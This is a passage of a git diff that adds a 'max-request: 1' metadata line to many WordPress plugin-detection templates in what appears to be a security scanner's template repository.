   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
